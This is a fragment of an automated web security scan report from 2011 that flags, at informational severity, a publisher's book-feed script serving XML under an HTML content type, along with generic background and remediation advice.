ETag: "68d21b-15846-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 88134
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

//TERMS OF USE
if (window.location.href.indexOf("&param=TOU") != -1) {
$j('#ka_mainContainer').addClass('legalPages').html('<h3>TERMS OF USE</h3> <p>The Effective Date of these Terms of Use ("TOU") i
...[SNIP]...
</b> infringments@simonandschuster.com <br>
...[SNIP]...
<a href="mailto:privacyadministrator@simonandschuster.com"><b>privacyadministrator@simonandschuster.com</b>
...[SNIP]...
<a href="mailto:pocketafterdark@simonandschuster.com"><b>pocketafterdark@simonandschuster.com</b>
...[SNIP]...
<a href="mailto:privacyadministrator@simonandschuster.com"><b>privacyadministrator@simonandschuster.com</b>
...[SNIP]...

6. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/utils/featuredBookFeed.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

Response

Report generated by XSS.CX at Thu Apr 28 13:42:52 CDT 2011.